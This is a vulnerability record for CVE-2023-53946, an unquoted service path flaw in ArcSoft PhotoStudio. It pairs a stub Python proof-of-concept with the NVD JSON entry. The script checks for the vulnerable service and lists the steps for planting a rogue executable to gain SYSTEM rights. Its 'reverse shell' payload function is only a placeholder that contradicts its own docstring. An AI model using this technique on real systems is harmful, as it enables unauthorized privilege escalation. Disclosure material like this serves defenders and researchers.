CVE-2023-53946

# CVE-2023-53946 PoC - Unquoted Service Path Privilege Escalation # Target: ArcSoft Exchange Service in ArcSoft PhotoStudio 6.0.0.172 # Author: Security Researcher # Note: This is for educational and authorized testing purposes only import os import sys import subprocess import shutil def check_vulnerability(): """Check if the system is vulnerable to CVE-2023-53946""" print("[*] Checking for vulnerable ArcSoft PhotoStudio installation...") # Common installation paths for ArcSoft PhotoStudio paths_to_check = [ r"C:\Program Files\ArcSoft\PhotoStudio\ArcSoft Exchange Service.exe", r"C:\Program Files (x86)\ArcSoft\PhotoStudio\ArcSoft Exchange Service.exe" ] for path in paths_to_check: if os.path.exists(path): print(f"[+] Found ArcSoft Exchange Service at: {path}") print("[+] System may be vulnerable to CVE-2023-53946") return True print("[-] ArcSoft PhotoStudio not found or not installed") return False def create_malicious_executable(): """Generate a reverse shell payload as the malicious executable""" print("[*] Generating malicious executable...") # The executable should be named according to the unquoted path # For example: if path is C:\Program Files\ArcSoft\... # attacker places Program.exe in a writable directory # This would contain actual malicious code in real attack # For demonstration, we create a simple executable stub print("[*] Payload generation placeholder") print("[*] In real attack: Create executable named 'Program.exe' or similar") return True def exploit(): """Exploitation steps for CVE-2023-53946""" print("\n[*] CVE-2023-53946 Exploitation Steps:") print("=" * 60) print("1. Identify writable directory in unquoted service path") print("2. Create malicious executable with name matching path component") print("3. Place malicious executable in writable directory") print("4. Wait for service restart or trigger manually") print("5. Malicious code executes with SYSTEM privileges") print("=" * 60) return True if __name__ == "__main__": print("CVE-2023-53946 - ArcSoft PhotoStudio Unquoted Service Path") print("Author: Security Researcher | For authorized testing only\n") if os.name == 'nt': check_vulnerability() create_malicious_executable() exploit() else: print("[-] This exploit only works on Windows systems")

{"cve": {"id": "CVE-2023-53946", "sourceIdentifier": "[email protected]", "published": "2025-12-19T21:15:49.850", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arcsoft PhotoStudio 6.0.0.172 contains an unquoted service path vulnerability in the ArcSoft Exchange Service that allows local attackers to escalate privileges. Attackers can place a malicious executable in the unquoted path and trigger the service to execute arbitrary code with system-level permissions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.arcsoft.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51393", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/arcsoft-photostudio-unquoted-service-path-privilege-escalation", "source": "[email protected]"}]}}